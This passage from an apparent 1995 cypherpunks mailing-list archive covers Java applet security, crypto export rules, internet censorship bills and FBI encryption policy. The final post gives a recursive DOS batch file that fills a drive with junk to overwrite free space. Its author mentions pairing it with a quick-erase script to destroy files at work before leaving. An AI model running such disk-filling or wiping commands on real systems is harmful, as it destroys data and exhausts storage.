M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 28 Jul 95 00:32:58 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <ac3dcd76080210046dfa@[205.199.118.202]>
Message-ID: <199507280729.DAA01649@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Just a quick note to chime in. The OSF just did a deal with Sun
to port Java to several platforms. The OSF is opening a "web mall"
where you can grab software objects and run them. Expect to Java
*really* take off in about 2-3 months. Every business on the net is going
to want a Java shopping-client-basket on their web-mall/web-store.
(Web Consultants! Learn Java!)

-Ray

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Fri, 28 Jul 95 03:14:23 PDT
To: wmono@Direct.CA
Subject: Re:  "Encryption" IRC script?
Message-ID: <199507281013.EAA16859@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Yes, there are scripts that implement des encryption of IRC sessions,
using RSA to swap keys. (the encrypted lines always start with "clipper:"
on mine. I don't think it's the same as the one you've got, but yes,
they are out there. (See what you miss when you can't find people on
the #crypto channel!?!)
 
The channel that was used to coordinate against a recent spam attack
of remailers turned into a rather interesting chat about several subjects.
(Including digicash) It was about two months worth of cpunks... (without
the normally-cooresponding year's worth of alt.conspiracy reposts!!)
Maybe it would be fun to actually use the #crypto channel. (Unless there's
a #cpunk channel I don't know about?)
 
Don
 
Sorry I haven't been signing lately, but I've been replaced by a double.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 28 Jul 95 03:45:54 PDT
To: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Subject: Re: NSA and the NCSA/Apache web servers
In-Reply-To: <9507280320.AA28749@paganini.sydney.sterling.com>
Message-ID: <9507281039.AA13694@all.net>
MIME-Version: 1.0
Content-Type: text


> 
>   
> "Amir Y. Rosenblatt" <axon@neuron.net> wrote:
>   Wow -- hooks to encryption are unexportable -- now THAT's bullshit.  Sheesh.
> 
> A few yuears ago I asked Matt Blaze if he would
> publish CFS with the sryptography removed, and he
> told me that AT&T's lawyers also believed this to
> be true. (So, of course, his answer was "No".)
> The hooks are as important as the crypto code.
> 
> Interestingly though, Kerberos made it to
> Australia (Bond University I think) legally.

Actually, neither hooks nor encryption are unexportable, you just need
a license to export them.  I got a license to export an RSA encryption
scheme and a general purpose hook into encryption for integrity toolkit.
It took a few months and was not very difficult, but you have to apply.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 28 Jul 95 05:43:43 PDT
To: cypherpunks@toad.com
Subject: NYT on SuperGrassley
Message-ID: <199507281243.IAA01247@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, July 28, 1995, p. A26.


   [Editorial] Senator Grassley's Surf Police


   An academic study suggesting that the Internet is awash in
   bestiality, pedophilia and other kinky sex turns out to
   have been seriously flawed. Politicians like Senator
   Charles Grassley who waved the study around as an argument
   for intrusive regulation have stopped doing so. But Mr.
   Grassley and his allies have not backed off from their
   drive to draft unnecessary legislative restrictions on
   computer communications. Earlier this summer, Senator James
   Exon attached an amendment to the Senate version of a
   telecommunications bill that would impose Federal penalties
   on those who made available material deemed unsuitable for
   children.

   The unreliable study that did much to spur this bad
   legislating was conducted by Marty Rimm, then an
   undergraduate at Carnegie-Mellon University. It was
   reprinted in the Georgetown Law Journal and served as the
   basis for a credulous Time magazine article early this
   month. Mr. Rimm's academic supervisors have since made
   clear that the study had serious defects. The likelihood
   that children will be accidentally deluged with sexually
   charged computer graphics is much smaller than Mr. Rimm and
   his promoters suggested.

   Furthermore, to the extent that any problem exists, the
   best response is not through heavyhanded, constitutionally
   dubious legislation but parental education and
   discretionary user controls.

   Mr. Rimm's study looked at the computer habits of adults.
   He focused not on generally accessible areas of the
   Internet but on separate, commercial adult bulletin board
   services that require special procedures to find and use.
   This, critics note, is like visiting an adult bookstore and
   using the percentage of gamey titles to generalize about
   the contents of all bookstores. He also looked, less
   carefully, at specialized areas of the Internet that would
   be hard to stumble upon by accident.

   By Mr. Rimm's own calculations, less than 1 percent of all
   material on the Internet itself is raunchy, although this
   tiny percentage is unusually popular among the adults he
   surveyed. Another Carnegie-Mellon study, focusing on
   families with high school children, suggests that sexually
   explicit material is much less popular among these users.

   To be sure, sexually explicit material that would be
   offensive to some users can be found on the Internet. It is
   within the reach of computer-literate children using the
   networks without parental supervision.

   But the problem is being exaggerated to create a pretext
   for restricting the material available to adult users of
   computers. Some members of Congress, out of political greed
   or ignorance, want to censor what can be put on the Net and
   prosecute those who post legal but raunchy material. The
   approaches being advocated by Mr. Exon and Mr. Grassley are
   unwarranted and unconstitutional.

   They are also impractical. Material posted to the Internet
   in foreign countries, beyond the reach of American law, is
   as available to users as domestically posted material.
   Items can also be posted through anonymous mailers that
   make it impossible to identify the original source.
   Censorship would also have the unwelcome effect of
   restricting adults to reading and viewing material deemed
   suitable for children, and would stunt the future of the
   networks as a medium for artistic expression.

   Parents who want to restrict what their children are able
   to call up on their computers can avail themselves of
   software now available on the market that can block out
   unwanted material. Filtering out such material at the user
   end is a more practical, and far less objectionable,
   approach than limiting a nation of computer users to baby
   talk.

   Such devices are not foolproof, of course. The surest
   defense is for parents to try to teach their children the
   kind of healthy values that would make them uninterested
   in, or immune to, sexually exploitative material.

   [End]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Smith <chris@deltacom.mindspring.com>
Date: Fri, 28 Jul 95 06:45:08 PDT
To: cypherpunks@toad.com
Subject: Quicken's new version
Message-ID: <Pine.LNX.3.91.950728084231.1957A-100000@deltacom.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


If I am out of place for posting here, forgive me; however, I do believe 
this germane.  Compass Bank here in Alabama is joining twenty other banks 
around the country to offer dial-in banking via Quicken's new software 
release.  Does anyone know or have heard of the security mechanisms which 
are to be built in to this product, specifically authent and encryption?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 28 Jul 95 06:08:21 PDT
To: meredith@ecid.cig.mot.com (Andrew D Meredith)
Subject: Re: Hooks to Crypto>
In-Reply-To: <9507281237.ZM15500@jurua.sweng.ecid.cig.mot.com>
Message-ID: <9507281300.AA22773@all.net>
MIME-Version: 1.0
Content-Type: text


...
> > Actually, neither hooks nor encryption are unexportable, you
> > just need a license to export them.
...

> I hope I'm not alone in wondering why on earth this is the case.

They don't want to encourage encryption if they can avoid it.  It
impairs their ability to gather intelligence.

> Ok, exporting cryptography from the USA is restricted, and highly
> controversial. I think there has been something on this one already.
>
> But what is it, in the legal wibble, that make _hooks_ to
> cryptography restricted. How have they worded things to make this the
> case.

Legal? What makes you think so? It hasn't made it to the courts yet
because people in the US aren't willing to risk jail for over their
right to do it.  The only court case I am aware of was the RSA case and
in that one, the courts ruled against the NSA - but in today's political
and economic environment, people who do cryptography don't want to risk
it.

> The hooks are of course completely useless in and of themselves. You
> can only do anything useful with them if you have the matching crypto
> package.

Not really right.  It's very easy to change a compression hook into an
encryption hook using standard off-the-shelf shareware, public domain
software, or commercial products.

> Yours a confused Brit ... who doesn't have this problem ... yet!!

Don't bet on it.  If you really try to export top-flight encryption
technology in a big way, you may find that your government can be
just as opressive as mine.

-- 
-> See:  Info-Sec Heaven using our New Super Secure World-Wide-Web Server
-> Free: Test your system's security (scans deeper than SATAN or ISS!)
---------------------- both at URL: http://all.net ----------------------
-> Read: "Protection and Security on the Information Superhighway"
	 John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95
-------------------------------------------------------------------------
   Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
Date: Fri, 28 Jul 95 00:17:39 PDT
To: Bill Trost <trost@cloud.rain.com>
Subject: Re: copyrighting algorithms
Message-ID: <9507280717.AA07537@sirius.wi.WHU-Koblenz.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

From: Bill Trost <trost@cloud.rain.com>
>
>Wolfgang Roeckelein writes:
>    >I wasn't aware that you could copyright an algorithm.  Patent,
>    >yes, but not copyright.  Intellectual property meens secret,
>    >right?  Aren't there any precendence cases involving propriety
>    >schemes that are reverse engineered?
>
>    Game cartridges (I think sega was involved)
>
>You might be referring to Nintendo vs. Galoob, which was used as a
>sample case in an January 1994 article in the Communications of the
>ACM titled "Copyright's Fair use Doctrine and Digital Data".  The
>article states

No, I was referring to a case, where a third party game cartridges manufacturer  
reverse engineered the specifications of the game cartridges slot for producing  
his own cartridges for this game.

Unfortunatly, I have lost the reference and the names of the companies, but  
this is the main case cited when it comes to reverse engineering propriety  
schemes. Maybe I can dig this out, or another member of the list has details  
available.

  Wolfgang
---
Dipl.-Wirtsch.-Inf.	Voice:	+49 261 6509 173
Wolfgang Roeckelein	Fax:	+49 261 6509 179
WHU Koblenz		E-Mail:	roeckelein@wi.whu-koblenz.de
Burgplatz 2			(NeXTmail ok)
D-56179 Vallendar	WWW:	http://www.whu-koblenz.de/~wolfgang/
Germany
--rsa--------------------------------8<-------------------------------------
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
-------------------------------------8<-------------------------------------
TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365
Residents of the USA & France *MUST NOT* include this .sig if following up!
*** Residents of France & Russia *MUST NOT* make any use of this -sig !  ***




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alan pugh <alan.pugh@internetmci.com>
Date: Fri, 28 Jul 95 07:02:25 PDT
To: cypherpunks@toad.com
Subject: http://www2.pcy.mci.net/whats-new/editors/meeks/index.html
Message-ID: <01HTEDK5W95U8WWCLS@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


mostly old news for the readers here, but relevant to the list.
this was found at the net editors off of mci's webpage.

> 
> The Assault on Private Encryption
> 
> by Brock N. Meeks
> 
> Washington, DC -- The other shoe has dropped now, several times.
> 
> The political backlash and emotional fallout of the bombing of the
> federal building in Oklahoma City still lingers here. FBI Director
> Louis Freeh is using that event as a lever to wage a kind of private
> war against the use of private encryption schemes.
> 
> According to Administration sources, several different proposals are
> now being discussed on how the government might go about implementing
> a policy of government mandated, government "certified" encryption.
> The most hardline of these proposals would outlaw your ability to
> choose an encryption scheme which the government couldn't break, under
> the authority of a court order.
> 
> Freeh has left no doubts that his next target -- after successfully
> getting Congress to pass the $500 million Digital Telephony Bill,
> which gives law enforcement agencies an "easy access" method of
> eavesdropping on telephone conversations-- his is private encryption.
> 
> During an appropriations hearing in May, Freeh told a congressional
> panel: "[W]e're in favor of strong encryption, robust encryption. The
> country needs it, industry needs it. We just want to make sure we have
> a trap door and key under some judge's authority where we can get
> there if somebody is planning a crime."
> 
> That means an end any non-government approved encryption technology
> that doesn't have some means of providing the Feds with it's treasured
> "back door." Under this scheme, for example, the widely-used Pretty
> Good Privacy (PGP) encryption program would be, essentially, illegal
> to own or at least, illegal for a U.S. citizen to use inside U.S.
> borders.
> 
> Private encryption schemes allow a person to scramble an electronic
> message so that, if intercepted by an unintended party, it is rendered
> unreadable. These scrambling programs are useful to a wide range of
> people and interests, including researchers that want to keep their
> proprietary breakthroughs safe from prying eyes to corporations
> sending trade secrets to a distant office across the Net to ordinary
> folks sending a steamy love letter to a lover.
> 
> But these same encryption programs are being used by "terrorists and
> international drug traffickers," as well, claims FBI Director Freeh,
> and that makes private encryption schemes a threat to national
> security.
> 
> Freeh's crusade against encryption is being backed by been joined the
> Justice Department, with the gleeful back alley goading of the
> nation's top spook group, the National Security Agency.
> 
> To meet the "challenges of terrorism," Freeh said, several things must
> be done, among them, deal with "encryption capabilities available to
> criminals and terrorists" because such technology endangers "the
> future usefulness of court-authorized wiretaps. This problem must be
> resolved."
> 
> While Freeh has used the Oklahoma City bombing as convenient "news
> hook" to again make a pitch to "resolve" the private encryption
> "problem," the Director was basically reading from a dog-eared script.
> Within the last several months he has repeatedly testified publicly
> before Congress about the "evils" of encryption.
> 
> On March 30 the House Judiciary Committee's Subcommittee on Crime he
> said:
> 
> "Even though access is all but assured [by the passage of the Digital
> Wiretap Act] an even more difficult problem with court-authorized
> wiretaps looms. Powerful encryption is becoming commonplace. The drug
> cartels are buying sophisticated communications equipment.... This, as
> much as any issue, jeopardizes the public safety and national security
> of this country. Drug cartels, terrorists, and kidnappers will use
> telephones and other communications media with impunity knowing that
> their conversations are immune from our most valued investigative
> technique."
> 
> Then during a May 3 appearance before the same Committee, Freeh said:
> "Encryption capabilities available to criminals and terrorists, both
> now and in days to come, must be dealt with promptly. We will not have
> an effective counterterrorism strategy if we do not solve the problem
> of encryption."
> 
> But there's nothing to be alarmed at here, according to Freeh. Just
> because he's asking the Congress and the White House to strip you of
> the right to choose how you scramble your messages, using a program
> that the government doesn't hold all the keys too, doesn't mean that
> the Director isn't a sensitive guy or that he has suddenly taken a
> liking to wearing jackboots.
> 
> Freeh steadfastly maintains all these new powers he's asking for are
> simply "tools" and "not new authorities." These new powers are "well
> within the Constitution," Freeh told Congress.
> 
> Freeh hasn't publicly outlined just how he proposes to "resolve" the
> "encryption problem." However, according to an FBI source, several
> plans are in the works. The source refused to detail any specific
> plan, but added: "Let's just say everything is on the table." Does
> that include outlawing private encryption schemes? "I said
> 'everything,'" the source said.
> 
> The encryption debate has been raging for years. Two years ago the
> Clinton Administration unveiled a new policy in which it proposed to
> flood the market with its own home-grown encryption devices -- a
> product of the National Security Agency -- called the "Clipper Chip."
> 
> The Clipper is based on a "key-escrow" system. Two government agencies
> would hold the keys "in escrow", which are unique to each chip, in a
> kind of "data vault." Any time the FBI-- or your local sheriff --
> wanted to tap your phone conversations, they would have to ask a judge
> to give the two government agencies to turn over the keys to you
> Clipper chip. With those keys, the FBI could then unscramble any of
> your conversations at will.
> 
> That policy raised a huge firestorm of controversy and the Clipper
> sunk from sight, down, but not out. The intent of the White House,
> acting as a front man for the NSA and other intelligence agencies
> along with the FBI, was to have Americans adopt Clipper voluntarily



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 28 Jul 95 06:43:59 PDT
To: Ray Arachelian <perry@imsi.com
Subject: Re: "Only on the Cypherpunks list..."
In-Reply-To: <9507271447.AA12988@snark.imsi.com>
Message-ID: <0k6CY5SMc50e9Dw4U4@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 27-Jul-95 Re: "Only on the Cypherpunk.. "Perry E.
Metzger"@imsi. (292)

> NetBSD, not FreeBSD. There is also MachTen.

Yes, I can attest to the fact that MachTen is *amazing*, particularly
its seamless integration of the Mac and UNIX file systems.  It's worth
getting it even if the only thing you ever use it for is to do "find"
and "grep" through your Macintosh files.....
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMAN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 28 Jul 95 08:00:11 PDT
To: KDAGUIO@aba.com
Subject: Re: Banks and Crypto - Again
Message-ID: <9507281459.AA03673@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Critics say that the longer DES is used, the more likely its code
>  could be broken.  While realizing this could limit its life span
>  as a government certified standard, ABA warned that requiring banks
>  to convert to a new standard by 1998 (the year DES's certification
>  expires) could be prohibitively costly due to the high level of
>  electronic funds transfers secured by DES.  ABA therefore encouraged
>  the National Institute for Standards and Technology (NIST) to
>  continue to endorse DES as a Federal Information Processing Standard
>  (FIPS) for use by the financial community.

"Breaking DES keys in a reasonable amount of time could be prohibitively  
costly for Banks due to the high level of electronic funds transfers secured  
by DES."

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 28 Jul 95 07:07:28 PDT
To: meredith@ecid.cig.mot.com (Andrew D Meredith)
Subject: Re: Hooks to Crypto
In-Reply-To: <9507281450.ZM15992@jurua.sweng.ecid.cig.mot.com>
Message-ID: <9507281401.AA26689@all.net>
MIME-Version: 1.0
Content-Type: text


...
> > because people in the US aren't willing to risk jail for over their
> > right to do it.  The only court case I am aware of was the RSA case
> > and in that one, the courts ruled against the NSA - but in today's
> > political and economic environment, people who do cryptography
> > don't want to risk it.
> 
> Judging by the PZ case, I can't say as I can really blame them. it
> would be better of course if they would go for it, but ...

In my case, I just opted to moving my crypto business outside the US. 
This is the real result of the crypto policy.  The US is falling behind
the rest of thew world in crypto R+D.  For example, two good crypto
packages for the Internet have been released in the last few months.  I
was engaged in a similar project in the late 80s but abandoned it
because I couldn't export, so the market would not justify the work. 
Now it is owned by people in EC and Australia who are generous enough to
allow those of us in the US to use them.

Of course, I can't post them in info-sec heaven because even imported
crypto software may not be exported, and I cannot adequately detect the
difference between a foreign person using a US site to get the
information and a legitimate US site getting the information for itself. 
In other words, the policy prevents US firms from having better Internet
resources in the info-sec arena.

...
> This would infer that anything that can cause information to be piped
> out to a package and then the result sucked back in would fall into
> this category.

Right - in other words, nothing can be exported if it produces output
and takes input.  The point is, they want a way to arrest people who are
doing something they don't like.  Philo Zimmerman would almost certainly
win if they ever took him to court, but by harassing him in this more
subtle way, they destroy the impact of PGP in the marketplace, get MIT
to support an official (and perhaps customized for the NSA to have weak
keys) version, and prevent others from following in Phil's footsteps. 
So the strategy works until some brave person risks enough top get past
it.

...
> 1 - Find yourself a tenuous link with some Psycho-Baby-Killer group.
> 2 - Start a "This must be stopped" campain.
> 3 - Propose the "Internet Pornography Act"
> 4 - Shove it through before anyone can get together enough
>     opposition to get it squashed. (and that would have to be a
>     GREAT DEAL of opposition).
> 
> That's how they did the "Criminal Justice Act" which breaks both
> European and International law in a great many places. That's how
> they'll do the "Internet Pornography Act". It'll be just loose enough
> to include just about anything they want it to.

All true, but as the saying goes:

Representative democracy is a terrible form of government,
but every other form of government we know of is even worse.

-- 
-> See:  Info-Sec Heaven using our New Super Secure World-Wide-Web Server
-> Free: Test your system's security (scans deeper than SATAN or ISS!)
---------------------- both at URL: http://all.net ----------------------
-> Read: "Protection and Security on the Information Superhighway"
	 John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95
-------------------------------------------------------------------------
   Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 28 Jul 95 07:12:00 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199507280729.DAA01649@clark.net>
Message-ID: <9507281410.AA07271@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
> 
>   Just a quick note to chime in. The OSF just did a deal with Sun
> to port Java to several platforms. The OSF is opening a "web mall"
> where you can grab software objects and run them. Expect to Java
> *really* take off in about 2-3 months. Every business on the net is going
> to want a Java shopping-client-basket on their web-mall/web-store.
> (Web Consultants! Learn Java!)

As a security consultant, I'm very happy about Java because once the
holes are found in it and massive, Morris style worms are launched
with it, I'll be laughing all the way to the bank.

I exagerate only slightly. I don't believe Java to be secure, in spite
of the claims. Its too complicated, and it operates in an environment
who's correct operation is required for it to remain secure. Good
system design says that you want a system's failure mode to produce a
secure result, but thats not what Java does.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "david d `zoo' zuhn" <zoo@armadillo.com>
Date: Fri, 28 Jul 95 08:53:36 PDT
To: cypherpunks@toad.com
Subject: Re: Java, Netscape, OpenDoc, and Babel
Message-ID: <199507281554.KAA08561@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


[ Web Mall, OSF, Java, ports, etc]

//  See http://www.osf.org/comm/press/950276-ato.html for mroe details.

Actually, try http http://www.osf.org/comm/press/950726-ato.html instead.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Fri, 28 Jul 95 08:03:54 PDT
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: Java, Netscape, OpenDoc, and Babel (NewsClip)
In-Reply-To: <199507281335.PAA27686@utopia.hacktic.nl>
Message-ID: <9507281503.AA22612@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Based on the recently posted announcement, it is not at all clear that the
following is accurate:

	The OSF is opening a "web mall"
> where you can grab software objects and run them

Can somebody confirm or deny this? It makes a big difference. A few additional
ports won't significantly enhance Java's adoption as the standard for secure
interplatform network transport of executables. This has been a done deal
since Netscape announced that it was licensing and Sun committed to Mac and
Win95 ports.

On the other hand, a Java object brokerage service sponsored by OSF
including a few basic object support services could make a substantial
difference in the pace at which Java class libraries develop.

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 28 Jul 95 08:05:55 PDT
To: cypherpunks@toad.com
Subject: Re: Java, Netscape, OpenDoc, and Babel
Message-ID: <9507281504.AA06867@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Just a quick note to chime in. The OSF just did a deal with Sun
>to port Java to several platforms. The OSF is opening a "web mall"
>where you can grab software objects and run them. 

Well, not quite.  The "Open Mall" is part of OSF's new advanced technology
offerings.  Free source for non-commercial use, fetchable from the Open
Mall, a Web server.  You'll be able to find the mall (in a week or two)
from OSF's home page, http://www.osf.org/.

The Java ATO includes ports to SVR4 (dunno whose) and HP, and more
importantly, a study of the security aspects and implications of Java:
is it truly a "safe" language to write in?  And what does safe mean, and for
whom (server, client, user, hardware, etc)?  The study will be a paper, also
avail from the mall.

See http://www.osf.org/comm/press/950276-ato.html for mroe details.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Fri, 28 Jul 95 08:25:43 PDT
To: perry@piermont.com
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281410.AA07271@snark.imsi.com>
Message-ID: <9507281525.AA22734@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


|> As a security consultant, I'm very happy about Java because once the
|> holes are found in it and massive, Morris style worms are launched
|> with it, I'll be laughing all the way to the bank.

|> I exagerate only slightly. I don't believe Java to be secure, in spite
|> of the claims. Its too complicated, and it operates in an environment
|> who's correct operation is required for it to remain secure. Good
|> system design says that you want a system's failure mode to produce a
|> secure result, but thats not what Java does.

I disagree for the simple reason that Java and Hotjava are not being
treated as trusted code in their applications. Applets are tightly
contrained in what they can do, and hotjava's default attempt to
configure a "firewall" when it boots up is not likely to engender a false
sense of security.

I've been looking at the Java code closely for a couple of months now, and
I find it to be relatively clean in its implementation (Solaris version at
least). I think the biggest worry might be holes in the non-Sun ports along
the host machine interfaces. Overall, I give the Solaris implementation
extremelly high marks in terms of its security. I think I'm actually more
worried by far less powerful browsers whose code I don't approve of, like
Mosaic. The vast majority of security problems result from the fact that
most code has security added in AFTER coding starts. Java has been designed
for excellent security from the very begining.

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 28 Jul 95 08:30:53 PDT
To: solman@MIT.EDU
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281525.AA22734@ua.MIT.EDU>
Message-ID: <9507281530.AA18869@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



solman@MIT.EDU writes:
> I disagree for the simple reason that Java and Hotjava are not being
> treated as trusted code in their applications. Applets are tightly
> contrained in what they can do,

You are incorrect. Applets are DESIGNED to be tightly constrained in
what they do. You want to bet your career that there are no bugs in
the implementation of this design? The thing keeping you from opening
sockets or doing file-io is a very thin scrim. Are you *certain* that
it is bug free? I'm not.

> I've been looking at the Java code closely for a couple of months now, and
> I find it to be relatively clean in its implementation (Solaris version at
> least).

Are you willing to bet your career that its bug free? Thats my question.

> I think I'm actually more worried by far less powerful browsers
> whose code I don't approve of, like Mosaic.

Don't get me wrong -- Mosaic also bothers me, as does Netscape. Java,
however, gives me the willies.

> The vast majority of security problems result from the fact that
> most code has security added in AFTER coding starts. Java has been
> designed for excellent security from the very begining.

*designed*. Can you be certain that both the design and the
implementation are bug free?

I like systems that are more fail-safe. About half a dozen
simultaneous bugs would be needed to break some of my more secure
firewalls, for example. Java does *not* provide security in depth.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Fri, 28 Jul 95 08:46:08 PDT
To: Andrew D Meredith <meredith@ecid.cig.mot.com>
Subject: Re: Hooks to Crypto (was Re: NSA and the NCSA/Apache web servers)
In-Reply-To: <9507281237.ZM15500@jurua.sweng.ecid.cig.mot.com>
Message-ID: <Pine.BSD/.3.91.950728113326.24958G-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 28 Jul 1995, Andrew D Meredith wrote:

> On Jul 28, 12:18pm, Dr. Frederick B. Cohen wrote:
> > Subject: Re: NSA and the NCSA/Apache web servers
> 
> > Actually, neither hooks nor encryption are unexportable, you
> > just need a license to export them.

The answer is to have some non-USA entity build shareable full fledged 
full powered crypto libraries and provide them for free for the rest of 
the world and for all machines.

On Windoze DLL's or WIN32's would be needed, on PPC Mac's shared Lib's, 
on 68K Macs, an INIT that hooks itself via Gestalt, on Unix, shared 
LIB's, etc.  I would also include routines for asking the user for a 
passphrase to prevent the running application from grabbing that password 
and providing weak security.  Or a program running in the background that 
handles all the calls via IAC's or whatever... (like AppleEvents to PGP)

All with full free source, etc and PGP compatibility, etc.  Then the rest 
of us could write code that uses that library.  Whoever wants crypto just 
downloads the library from whereever and uses it.

In this case, would code written in the USA be exportable?  

Wei's library would have been perfect for something like this... too bad. :-(

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Fri, 28 Jul 95 09:09:43 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: mac share/freeware app for overwriting unused hd space?
In-Reply-To: <ac3dc7f7060210042380@[205.199.118.202]>
Message-ID: <Pine.BSD/.3.91.950728114323.24958L-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 27 Jul 1995, Timothy C. May wrote:

> At 2:27 PM 7/27/95, j. ercole wrote:
> >Can anyone point me towards a program that's freeware or shareware that
> >will overwrite all the unused i.e., "trashed" space on my hard drive(s)?  I
> >sincerely apologise if this is a faq.  I know norton's will do it but I
> >don't presently have that installed on my machine.  Thanks oodles,

Something could be written to just write a bunch of random garbage to a 
file until the volume runs out of free space, then overwrite that file 
several times before deleting it.  I think this is what MacTools's 
Trashback - EraseFreeSpace option does.  I used to do this for DOS 
machines with a batch file:

Type this is at the DOS prompt (for those who use DOS):
COPY CON FILLDRIVE.BAT

@ECHO OFF
@DIR >>KILLME.TXT
@TYPE KILLME.TXT >>KILLME.TXT
@FILLDRIVE.BAT   (hit RETURN ON THIS LINE AND THEN HOLD CONTROL AND HIT Z,
                  and RETURN again.)

Just run this until you see hard drive full errors.  This creates an 
exponentially increasing file called "KILLME.TXT" by copying that file to 
itself on each pass.  First pass the file is the size of the directory, 
the second pass, it's 3 times the size, the third pass 7 times, the 
fourth pass, it's 15 times, etc.

When your finnally run out of space, hit CONTROL-BREAK and then delete 
the KILLME.TXT file to release the free space.

Basically, no matter who I work for, I write a batch file that zaps the 
SecureDevice file on the root directory, then runs this thing, so if I 
have to leave the place in a hurry I can erase my personal files without 
much hassle and little danger of having them compromised.  (I also have a 
few other neat tools to let me know if someone has been snooping on my 
machine at work, but I won't disclose those :-)

Do this a few times and everything is cool.  Off the top of my head, the 
unix equivalent would be:

